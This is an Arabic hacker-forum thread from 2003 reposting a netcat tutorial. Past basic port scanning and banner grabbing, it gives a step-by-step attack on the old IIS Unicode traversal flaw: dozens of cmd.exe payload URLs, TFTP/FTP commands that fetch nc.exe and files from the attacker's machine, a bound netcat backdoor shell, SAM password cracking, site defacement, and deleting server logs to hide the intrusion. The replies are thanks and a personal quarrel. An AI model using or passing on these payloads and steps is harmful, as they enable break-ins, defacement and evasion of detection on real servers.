الحقو شرح النت كات باالصور (منقول)

El_TeNNiiN · 15-11-2003, 01:17

السلام عليكم انا نقلت الموضوع هنا للافادة و رابط الموضوع حتى لا يزعل الكاتب
http://arabdonkeyz.org/IB/index.php?showtopic=3126

بسم الله الرحمن الرحيم و به نستعين++++++++++++++++++
ممنوع استخدام كل ما فى الكتاب ضد العرب و المسلمين+++
اللهم ما بلغت اللهم ما فشهد+++++++++++++++++++++++++
++++++++++++++++++++++++++++++++++++++++++++++++++ ++
(--==SpiderZ==--)
************************************************** ***************************
WWW.ARABdonkeyZ.ORG منظمة الهكرز العربى©
************************************************** ***************************
هذا الموضوع لا يصرح بنقله و جميع الحقوق محفوظة للكاتب
© (--==SpiderZ==--) ©
و اذا اردت الكثير و الكثير يرجى الدخول الى موقعنا
WWW.ARABdonkeyZ.ORG مع تحيات فريق منتديات منظمة الهكر العربى
HTTP://IB.ARABdonkeyZ.ORG
************************************************** ***************************
(--==SpiderZ==--)جميع الحقوق محفوظة
************************************************** ***************************
لارسال اى استفسار يرجى مراسلة مدير منظمة الهكرز العربى
service@Alburaq.net donkeyZ_MasterZ (MasterZ)
او مراسلة SpiderZ4H@Hotmail.COM donkeyZ_SpiderZ (--==SpiderZ==--)
************************************************** ***************************
جميع الحقوق محفوظة©منظمة الهكر العربى
************************************************** ***************************
الموضوع عن النيت كات و هو للمبتدئين و المحترفين معا و هو من اعداد
(--==SpiderZ==--)
************************************************** ***************************
[align=center]A.H.O[/align]
**********************************************
©(--==SpiderZ==--)©
+++++++++++++++++++

بسم الله الرحمن الرحيم
http://download.arabdonkeyz.org/pafi...ion=file&id=58
يجب الدخول على الرابط لحميل النت كات ;)
اولا انا اعددت هذا الدرس للمبتدئين او اللى مش بيعرف شىء عن النيت كات
المهم
نبدأ ارجو التركيز لانه موضوع مهم
سكينة الجيش السويسرى
النيت كات اداة نافعة و هى تسمح بكتابة و قراءة البيانات عبر
TCP&UDP
و اتصالاتهم
و هى مسئولة عن عن حماية نظام الشبكةو هى اساسيه و اداة قديره جدا
و يمكن استخدامها كبورت سكانر
او باب خلفىdonkey
و اشياء كثيرة جدا
و سنتعرف على كل منهم بالتفصيل ‍
الدرس للمبتدئين و احضرت الاشياء السهل فهمها :!:
************************************************** ********************
اول مرحلة نبدأها فى رحلتنا مع النيت كات
************************************************** ********************
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++
WWW.ARABdonkeyZ.ORG
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++
طيب ناخد مثال عن البورت سكانر
+++++++++++++++++++++++++++++
--==SpiderZ==--
+++++++++++++++++++++++++++++
اول شىء يجب ان تفتح الدوس!
تذهب الى
RUN
COMMAND
ستفتح شاشة سوداء ها هى الدوس
طيب وش افعل انا الان فى الدوس
ركز
تعمل مثلا فولدر اسمه tools
فى الC
الان اذهب اليه
تكتب فى الدوس
cd\
ثم
c:
ثم انتر
cd tools
بس و بعد هيك تكتب
NC
الان وصلنا للاوامر !
طيب قولنا ان احنا هنبدأ بالبورت سكانر
طيب
انا عاوز اعمل سكان عالايبى هذا
192.168.1.90 من البورت 1الى البورت 200
وش اعمل؟
تكتب فى الاوامر
nc -v -w 2 -z 192.168.1.90 1-200
و راح تنتظر عاد راح يقول لك البورتات المفتوحه فى الايبى هذا
لانه سيحاول الدخول من كل البورتات من 1 الى 200
و يخبرك بنوع البورت
يعنى مثلا لو كان 21 مفتوح
<ftp> open
معناها بورت الاف تى بى مفتوح
طيب
الان فى صورة توضيحية مرفقة
الحقو النت باالصور (منقول)

طيب شفنا ازاى بنعمل بورت سكانر
مع تحيات
--==SpiderZ==--
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++
WWW.ARABdonkeyZ.ORG
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++
الاستخدام الثانى
+++++++++++++++
--==SpiderZ==--
+++++++++++++++
طيب لو اردنا نعرف هل الموقع ده وش بيعمل
و ايش اللى بيعمل بجانب البورت 21 أو 80
طيب وش افعل
اول شىء تجيب الايبى تبع الموقع من على الدوس
فرضا بأن الموقع هو WWW.ARABdonkeyZ.ORG
تخش عالدوس و نكتب
ping WWW.ARABdonkeyZ.ORG
و ننتظر شوى راح بيطلع الايبى تبع الموقع
طيب
الان طلعت ايبى الموقع وش اعمل ؟
اول شىء بنذهب للدوس
و بعدين؟
نخش عل الفولدر اللى بيه النت كات و اللى اتفقنا نسميه tools
طيب
و بعدين
تكتب
nc
و بعدها
nc -v -n 192.168.1.90 80
هذا طبعا ليس ايبى موقعنا و لكن هو مثال
طيب هناك صورة توضيحية تبين لك ما فى الموقع
و هذا على البورت 80
طيب نشوف الصورة التوضيحية
الحقو النت باالصور (منقول)

طيب الان نشوف البورت 21 و الخاص بالفى تي بى
FTP
نكتب المرة دى
nc -v -n 192.168.1.90 21
نشوف الصورة التوضيحية
الحقو النت باالصور (منقول)

بعد مشوفنا الصورة نلاقى ان شغال على ويندوز 2000
و سيرفر
IIS
و ftp service
طيب
الحين
لازم نعرف اليونيكود
راح اضع شرحة بالتفصيل
مع اننا هيفيدنا النيت كات فى ثغرات اليونيكود كتير
************************************************** *************************
UNICODE - Internet Information Service IIS4 - IIS5
اليونيكود – نظام خدمة المعلومات للانترنت الاصدار الرابع – الخامس

يحتوى هذا الدرس على ( 13 نقطة ) وهي كما يلي :
1- تعريف باليونيكود .
2- تاريخ ظهور هذه الثغرة .
3-كيفية ايجاد هذه الثغرات .
4- كيف يتم استغلال ثغرات اليونكود .
5- الاوامر المستخدمة بواسطة ملف CMD .
6- طريقة تطبيق هذه الثغرات .
7- كيفية اختصار ثغرة اليونيكود حتى تتمكن من تفعيل امر الـ ECHO .
8- طريقة نسخ ملف الـ CMD لاتاحة امكانية الكتابة على الملفات .
9- كيفية معرفة مشكلة الـ Access Denied والحلول المتبعة لها .
10- كيفية عمل اكاونت للدخول بواسطة الـFTP .
11- طريقة كشف باسورد الادمينستريتور .
12- تغيير الصفحة الرئيسية للموقع وعملية الاب لوود بواسطة برنامج TFTP .
13- مسح ملفات اللوق حتى لا يتم التعرف عليك .

- تعريف باليوني كود
اليونيكود عبارة عن مجموعة من الثغرات في مجموعة خدمة المعلومات التي ركبت مع IIS4.0 / IIS5.0 والذي ياتي عادة مع NT4 / Win2k .

تاريخ ظهور هذه الثغرة .
لايوجد تاريخ محدد لظهور اول ثغرة لليونيكود لذا يعتبر ظهورها بواسطة شخص مجهول anonymous person ، وقيل ان اول ظهور لثغرات اليونيكود كانت بواسطة الصينين ولكن لايوجد مايثبت صحة هذا الكلام لهذه الثغرات ، فتم استغلال هذه الثغرات من قبل المخترقين وتطوير البرامج اللازمة لها .

كيفية ايجاد هذه الثغرات
يتم ايجاد هذه الثغرات بطريقتين :-
1- بواسطة البرامج اللازمة والمتخصصة لكشف هذه الثغرات سواء بالبرامج التي تعمل على نظام ويندوز او بطريقة الشل والتي تعمل على نظام لينكس .
2- بواسطة تطبيق الثغرة على الموقع مباشرة .

الاوامر المستخدمة بواسطة ملف

- امر لانشاء دليل جديد .
- امر لالغاء دليل .
- امر النسخ .
- امر النقل .
- امر الحذف .
- امر تغيير اسماء الملفات .
- امر لرؤية محتويات الملف .
- امر الكتابة داخل أي ملف .
- امر لسحب أي ملف .

وهي حسب الامثلة التالية :

امر انشاء دليل جديد:-
http://www.xxxx.com/msadc/..%c0%af....xe?/c+md+c:\AHO

امر الغاء دليل :-
http://www.xxxx.com/msadc/..%c0%af....xe?/c+rd+c:\AHO
ملاجظة : لايمكن الغاء أي دليل الا اذا كان فارغاً تمام من الملفات والمجلدات

الامر المستخدم للنسخ :-
http://www.xxxx.com/msadc/..%c0%af....scripts\AHO.exe

الامر المستخدم للنقل :-
http://www.xxxx.com/msadc/..%c0%af....ripts\AHO.exe+c

الامر المستخدم للحذف :-
http://www.xxxx.com/msadc/..%c0%af....+del+c:\AHO.mdb

الامر المستخدم لتغيير مسمى الملفات :-
http://www.xxxx.com/msadc/..%c0%af....dex.htm+AHO.htm

الامر المستخدم لرؤية محتويات الملف :-
http://www.xxxx.com/msadc/..%c0%af....type+c:\AHO.txt

الامر المستخدم للكتابة داخل أي ملف :-
http://www.xxxx.com/msadc/..%c0%af.....>c:\AHO.txt

الامر المستخدم لعملية سحب أي ملف :-
عليك القيام اولاً بنسخ الملف المراد سحبه الى أي دليل وبعدها يتم كتابة اسم الملف في اخر العنوان كالتالي:
http://www.xxxx.com/msadc/AHO.mdb

- طريقة تطبيق هذه الثغرات

تطبيق الثغرة على الموقع من خلال المتصفح تتم حسب الامثلة التالية :-
http://www.xxxx.com/scripts/..%c1%1...md.exe?/c+dir+c
http://www.xxxx.com/scripts/..%c0%9...md.exe?/c+dir+c
http://www.xxxx.com/scripts/..%c0%a...md.exe?/c+dir+c
http://www.xxxx.com/scripts/..%c0%q...md.exe?/c+dir+c
http://www.xxxx.com/scripts/..%c1%8...md.exe?/c+dir+c
http://www.xxxx.com/scripts/..%c1%9...md.exe?/c+dir+c
http://www.xxxx.com/scripts/..%c1%p.../cmd.exe?/c+dir +c

وقد نحتاج الى تغيير مسمى الدليل بحيث يكون :-

Msadc , _vti_bin , iisadmpwd , _vit_admin , scripts , samples , cgi-bin

- كيفية اختصار ثغرة اليونيكود حتى تتمكن من تفعيل امر الـ ECHO .[/
في حالة اكتشاف موقع يعاني من مشكلة اليوني كود ولنفترض انه كان على هذه الثغرة :-
http://www.xxxx.com/msadc/..%c0%af....md.exe?/c+dir+c

فنحتاج الى نسخ ملف w3svc.exe الى مجلد inetpub\scripts والامر يكون بهذه الطريقة :-
http://www.xxxx.com/msadc/..%c0%af....ripts\w3svc.exe

بعد نسخ ملف w3svc.exe الى مجلد inetpub\scripts ، الان نقوم بتصفح الموقع من خلال الثغرة بهذه الطريقة :-
http://www.xxxx.com/scripts/w3svc.exe?/c+dir+c

الان نستطيع الكتابة داخل أي ملف وبالتحديد الملف الرئيسي للموقع الذي غالبا مايكون في هذا الدليل
inetpub\wwwroot\index.htm بحيث يكون الامر بالشكل التالي :-
http://www.xxxx.com/scripts/w3svc.e....root\index.htm

طريقة نسخ ملف الـCMD لاتاحة امكانية الكتابة على الملفات

الغرض من نسخ ملف الـCMD وهو لاعطاء امكانية للكتابة داخل السيرفر في بعض الحالات ويتم نسخه الى مجلد السيكربت بهذه الطريقة :-
http://www.xxxx.com/msadc/..%c0%af....cripts\cmd1.exe
الان بامكاننا استخدام ملف الـCMD الجديد في الثغرة بدلا من الاول بهذا الشكل :-
http://www.xxxx.com/msadc/..%c0%af....md1.exe?c+dir+c

كيفية معرفة مشكلة الـ Access Denied والحلول المتبعة لها

تتم معرفة مشكلة الـAccess Denied من خلال المحاولة في حذف أي ملف من أي امتداد ، فعند ظهور رسالة الـ Access Denied فاليك هذه الطرق حتى تتمكن من الكتابة على الملفات والتحكم اكثر على السيرفر :-
1- الطريقة الاولى نسخ ملف الـ CMD الى دليل السيكربت بمسمى CMD1 فسوف يتاح لك امكانية الكتابة باستخدام الامر Copy باستخدام هذا الامر :-
http://www.xxxx.com/msadc/..%c0%af....cripts\cmd1.exe
2- الطريقة الثانية بالتعامل مع الملف ssinc.dll والطريقة كما يلي :-
*اولا انشاء صفحة باسم test.shtml
*تكون هذه الصفحة داخل مجلد wwwroot/AHO/test.shtml
*كتابة هذا الكود داخل الصفحة  بحيث ان حرف A يتم كتابتة حتى يتعدى 2049 حرف .
*الان يتم طلب الصفحة من خلال المتصفح http://www.xxxx.com/test.shtml
*الان سوف تظهر لك الصفحة .
*الان تستطيع الكتابه وتم تخطي مشكلة الـAccess Denied

اذا ظهرت لك صفحة الخطاء رقم 500 فمعناها انك لم تقم بتطبيق الطريقة بالشكل الصحيح وعليك اعادة المحاولة .

3- الطريقة الثالثة باستخدام برنامج NC.exe بحيث يتم عمل اب لوود لهذا الملف داخل مجلد الـTemp في دليل الويندوز ومنه يتم تنفيذ الاوامر من خلال موجة الدوز وللمعلومية مجلد الـTemp مفتوح لعمليات الاب لوود .
4- الطريقة الرابعة وهي من خلال عمل كراش للسيرفر باستخدام البرامج اللازمة لهذا الغرض وهذه الطريقة غير مجديه في كثير من الاحيان .
5- البحث عن ملفات : root.exe ، sensepost.exe ، shell.exe ، w3svc.exe ونسخها الى مجلد c:\inetpub\scripts وتطبيق الثغرة من خلالها .
1- نسخ ملف CMD الى مجلد Scripts باسم Shell.exe حتى يتم الاستفادة من ثغرة قديمة
/c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\script s\shell.exe
2- انشاء ملف mspft.pll بواسطة الامر Echo وكتابة فيه التالي open ftp.host.com حيث ان هذا هو الخادم للـFTP .
/c+echo+open+ftp.host.com+>+c:\winnt\mspft.ppl
3- الان مطلوب اضافة مجهول Anonymous الى نفس الملف الذي قمنا بانشاءه mspft.pll
/shell.exe?/c+echo+anonymous+>>+c:\winnt\mspft.ppl
4- الان مطلوب ادراج البريد AHORay@Hotmail.Com الى نفس الملف الذي قمنا بانشاءه mspft.pll
/shell.exe?/c+echo+AHO@Hotmail.Com+>>+c:\winnt\mspft.ppl
5- إضافة User قبل Anonymous لزوم الملف الذي قمنا بانشاءه mspft.pll
/shell.exe?/c+echo+user+anonymous+>>+c:\winnt\mspft.ppl
6- الان تكرار لحاجة الاعداد
/shell.exe?/c+echo+AHO@Hotmail.Com+>>+c:\winnt\mspft.ppl
7- يتم هنا ادراج الموقع الحالي للملفات
/shell.exe?/c+echo+lcd+c:\inetpub\wwwroot+>>+c:\winnt\ms pft.ppl
8- الان يكتب اوامر الـFTP اللازمة لسحب الملف من خادم الـFTP وهي Get index.htm ثم يدرج هنا بدون المسج السابق
/shell.exe?/c+echo+get+index.html+>>+c:\winnt\mspft.ppl
9- هنا نفس السابق ولكن باضافة Quit
/shell.exe?/c+echo+quit+>>+c:\winnt\mspft.ppl
10- الان يتم تنفيذ امر FTP.exe?+"-s:c:winnt\mspft.ppl” وهو عبارة عن خطوات قمنا بانشاءها وموجودة في ملف mspft.ppl باحتوائها على مايلي :-
- Open FTP.host.com
- Anonymous
- A@Hotmail.Com
- User Anonymous
- A@Hotmail.Com
- Get index.html
- Quit

/msadc/..%c0%af../..%c0%af../winnt/system32/ftp.exe?+"-s:c:\winnt\mspft.ppl"

طريقة كشف باسورد الادمينستريتور

نحتاج الى وجود برنامجين وهي ( Microsoft Access – L0phtCrack ) لزوم تنفيذ بعض الخطوات التالية وهي :-
- باسورد الادمينستيتور للسيرفر يكون موجود في ملف الـ SAM._ في دليل \winnt\repair\ وافضل برنامج لفك شفرة الباسورد هو برنامج L0phtCrack .
اذا كان هناك مستخدمين في السيرفر ويوجد لديهم حساب فان معلوماتهم سوف تكون في ملف PASSFILT.DLL ونستطيع تحديد مسار هذا الملف من خلال الريجستري بواسطة هذا المفتاح :-

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contro
l\Lsa\SYSTEM32\PASSFILT.DLL

اذا كان السيرفر يعتمد في القراءة باستخدام صفحات الـ ASP للوصول الى البيانات من خلال قاعدة الـ MySQL فسوف نحتاج الى تطبيق ثغرة ( +.htr ) للوصول الى باسورد المسئول عن هذة القاعده وهي كالتالي :-
http://www.xxxx.com/default.asp+.htr

عند ظهور صفحة الخطا في الوصول الى الصفحة المطلوبة وبالتحديد في سيكربت التنفيذ فالطريقة صحيحة وماعلينا فقط سوى سحب ملف database.inc وقراءة محتوياته للعثور على اسم المستخدم والباسورد للمسئول عن قاعدة البيانات والان يتم الاتصال بها من خلال برنامج الـ Access .

تغيير الصفحة الرئيسية للموقع وعملية الاب لوود بواسطة برنامجTFTP /]

1- قم بانشاء صفحة وضع شعارك عليها واحفظها باسم index.htm على الـ c
2- قم بتشغيل برنامج TFTP ونفذ الامر في الفقرة التالية .

/c+tftp.exe+"-i"+1.1.1.1+GET+index.htm+C:\inetpub\wwwroot\index. htm

tftp.exe :
البرنامج اللازم لعمل الاب لوود ويجب ان يكون شغال في حالة تنفيذ الامر

"-i":
بمثابة باراميترز لزوم قراء البيانات في مكتبة الملفات

1.1.1.1 :
رقم الايبي الخاص بك

GET :
الامر اللازم لطلب الملفات مابين الارسال والاستقبال

index.htm :
اسم الملف بجهازك

\inetpub\wwwroot\ :
اسم الدليل في السيرفر

index.htm :
اسم الملف على السيرفر

- مسح ملفات اللوق حتى لا يتم التعرف عليك .
وتتم هذه العملية من خلال حذف ملفات الـ Log من مجلد System بواسطة الامر :-
/c+del+c:/winnt/system32/logfiles/*.log
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++
ثغرات الينيكود كلها
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++
/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system32/cmd.exe\?/c+dir+c:\
/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir
/MSADC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir
/MSADC/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir
/MSADC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir
/PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir
/PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir
/PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir
/Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir
/Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir
/Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/_vti_bin/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir
/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir
/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir
/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25% 35%63../winnt/system32/cmd.exe?/c+dir
/_vti_bin/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir
/_vti_bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir
/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../%77%69%6E%6E%74/s%79s%74%65%6D%33%32/%63%6D%64%2E%65%78%65?/c+dir
/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
/_vti_cnf/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir
/_vti_cnf/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir
/_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/scripts/..%s0%9v../winnt/system32/cmd.exe?/c+dir
/scripts/..%s0%af../winnt/system32/cmd.exe?/c+dir
/scripts/..%s0%qf../winnt/system32/cmd.exe?/c+dir
/scripts/..%s1%8s../winnt/system32/cmd.exe?/c+dir
/scripts/..%s1%9c../winnt/system32/cmd.exe?/c+dir
/scripts/..%s1%pc../winnt/system32/cmd.exe?/c+dir
/scripts/..%t0%9v../winnt/system32/cmd.exe?/c+dir
/scripts/..%t0%af../winnt/system32/cmd.exe?/c+dir
/scripts/..%t0%qf../winnt/system32/cmd.exe?/c+dir
/samples/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir
/samples/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir
/samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/samples/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir
/samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
************************************************** *****************************************
طيب شفنا الثغرات و اليونيكود و الان طيب كيف بفحص الموقع
فى برنامج سهل الاستخدام اسمه
fast cgi scanner by omran
المبرمج :الاخ عمران الغامدى
طيب كيف بيعمل البرنامج
اول شىء تاخد الثغرات تبع اليونيكود اذا لم تكن موجودة مع الملف من هنا
و تضعها فى ملف تسمية مثلا
UNICODE.txt
و طريقة تطبيق الثغرات مكتوبة فوق
طيب الان نشوف شرح عمران بالصور

الحقو النت باالصور (منقول)

احنا بقى دلوقتى عاوزني نعمل
upload
للنيت كات
شو بنعمل
لازن نحط علامة + بين الاوامر
طيب شو نعمل الحين
نكتب هكذا
http://<exploiturl>/c+TFTP+-i+192.168.1.90+get+nc.exe

exploit url
هو عنوان الثغرة فى الموقع
و يجب تشغيل برنامج
TFTP

الحقو النت باالصور (منقول)

اثناء هذه العملية
تستطيع الحصول عليه من مكتبة البرامج
اللى عندنا بالموقع
http://download.arabdonkeyz.org
طيب الان
بعد اما نرفع النيت كات شو بنعمل
ملاحظه
لارسال اسم اى موقع نستخدم الامر
GET
الان خلصنا جزء مهم
ندخل فى جزء تانى
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++++++++++++++
(--==SpiderZ==--)
+++++++++++++++++
الاستخدام الثالث
+++++++++++++++++
الان احنا عملنا
upload
للنيت كات على السيرفر
طيب احنا عاوزين نستخدمها كباك دور
عشان نتحكم صح فى السيرفر
طيب احنا لازم نختار بورت عشان نعمل كونيكت منه
ممكن نختار
البورت
10001
طيب شو بنعملاحنا بنقتح البورت عشان ندخل منه
باستعمال النيت كات طبعا
الامر هيكون كده
nc -l -p 10001 -d -r cmd.exe
ماذا اللى بتفعله هذه الاوامر
nc توضح لنظام التشغيل الويندوز انه يشغل النيت كات
-t حتى لا تغلق النيت كات الاتصال
-p لاختيار البورت الذى تفتح من خلاله الاتصال
-d توضيح للنت كات شو نوع الملف اللى بنريد نشغلة
-r لتوضيح شو هو البرنامج اللى هنشغله
طب لو عاوزين نستخدمها على قغرات اليونيكود من المتصفح
http://<exploiturl>/c+nc+-l+-p+10001+-d+-e+cmd.exe
طيب الان احنا بنشغل النيت كات على جهاز السيرفر
الحقو النت باالصور (منقول)

االن النيت كات هتتصل بالجهاز و نحصل على استخدام ال
cmd.exe
MS-DOS prompt
نشوف الصورة
!
احنا الان فى الجهاز اللى بنخترق منه
لو كتبنا
طبعا فى الفولدر اللى بيه النيت كات
nc -v -n 192.168.1.90 10001
نخش على السيرفر المخترق و لو حبينا نتأكد
نكتب امر
ipconfig
و هالامر بيحدد لك الايبى تبع الجهاز و معلومات اخرى
نجد ان الايبى تبع السيرفر المخترق
!!!!!!!!!!
الحقو النت باالصور (منقول)

الان انت فى الجهاز المخترق افعل اللى بتريدة
طبعا هنشوف كل شىء بالصور ايش اللى بنعمله
تنبيه!
انا وضعت شرح اليونيكود للمعرفة و زيادة المعلومات
طيب
خلصنا هذا الجزء
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++
الاستخدام الرابع
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++
****************
(--==SpiderZ=--)
****************
ازاى بقى نعمل
transferring file
باستعمال النيت كات
و انك تبعت ملفات
نستعمل الامر هذا
الان اعمل لك فايل سمية hack.txt
و اكتب فيه مثلا
donkey BY (--==SpiderZ==--)
و ضعه فى ملف النيت كات
لكى يستطيع السيرفر استقابل الملف
nc -l -p 1234>hack.txt
لو هنبعت الملف من عندنا

طيب نشوف الصورة
الحقو النت باالصور (منقول)

تحط الملف فى المجلد اللى فيه النيت كات
nc 192.168.1.90 1234 <hack.txt
الحقو النت باالصور (منقول)

كده انت خلصت
هنشوف الملف هيبقى عامل ازاى
الحقو النت باالصور (منقول)

لو عملنا dir
عشان نتأكد
الحقو النت باالصور (منقول)

++++++++++++++++++++++++++++++++++++++++++++++++++
بعض اوامر النت كات
طيب عشان نستخدم النت كات و نشوف الصفحة الرئيسية للموقع
هنستخدم الامر هذا
nc -v www.arabdonkeyz.org 80

هنعرف نوع الملقم تبع الموقع
و حاجات كتير

طيب لو عاوزين نرسل المعلومات دى لتكست
هنشوف
نكتب كده بس الاول ننشىء ملف يبقى اسمه
GET.TXT
الامر
NC -V WWW.ARABdonkeyZ.ORG 80 < GET.TXT
بس كل حاجه هتكون موجوده فى الملف اللى احنا عملناه و اللى اسمه
GET.TXT
الان عرفنا كيف بنجيب الملقم و معلومات عن الموقع
هذه امثلة للتدريب
اذا اردت المساعدة من النت كات
اكتب هذا الامر
nc -h
سوف يعرض لك جميع اوامر البرنامج و اى مساعدة اناحاضر
يرجى ارسال اى استفسار ألى
(--==SpiderZ==--)
SpiderZ4H@hotmail.com
مع تحيات الكاتب
(--==SpiderZ==--)
و مع تحيات فريق منتديات و موقع منظمة الهكر العربى
WWW.ARABdonkeyZ.ORG
++++++++++++++++++++++++++++++++++++++++++++++++++
جميع الحقوق محفوظة
© (--==SpiderZ==--)
انتظروا المزيد من الدروس للمبتدئين
الموضوع منقووووووووووووووووووووووووووووووووووول

الأسير · 15-11-2003, 02:02

الموضوع في غاية الروعة و شرح ولا اروع

شكراً

maxhak2000 · 15-11-2003, 10:23

تشكرات يالغالي على نقل الموضوع وكاتب الموضوع

ThE_X · 15-11-2003, 10:32

نقل جيد

لكن نص الموضوع دعايه !!!!!

anybody · 16-11-2003, 07:06

شكرا اخوي على الموضوع الجيد

لكن ليكسور لا تحاسب ناقل الموضوع لانه ناقل لا اقل ولا اكثر

ThE_X · 16-11-2003, 07:40

اخي انا ماحاسبته

هو رأي بالموضوع فقط

El_TeNNiiN · 18-11-2003, 03:05

انك اصلا كنت فى منتديات منظمة الهكر العربى
و كنت بتسرق مواضيع من هنا فى المنتدى و من كل منتدى
و اعتقد انك فاكر وقتعك مع كانسر لما سرقت موضوعه و قلت كاتب الموضوع MAKS
اللى هو l3x0r
الان
و بعدها قال لك ان انا كاتب الموضوع عدلت الرد و كتبت
انا لقبته فى احد المنتديا و قلت لضعه هنا
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
و طب لما انت لقبته فى احد المنتديات ليش بتكتب اسمك عالموضوع و تحفظ الحقوق
و تدخل بكذا اسمو ووترد كام رد مش كويس اعتقد انك بقيت معغروف فى منتديات المنظمة
و ان شاء الله يعرفوك عل حقيقتك باقى الناس و المنتديات
سلاااااااااااام
التنيييييييييييييييييييييييييييين

ThE_X · 18-11-2003, 03:33

اللهم اني صائم

لوما اني صائم لعرفت كيف ارد عليك

**hi_donkey** · 18-11-2003, 05:21

رجاء لا تدخلوا المشاحنات بينكم وكونوا اخوان وما في داعي للكلام ذا

تحياتي لكم وشاكر نقل الموضوع

NaWaL · 19-11-2003, 05:38

مشكور اخوي التنين الله يعطيك العافيه

بااااااايوووو
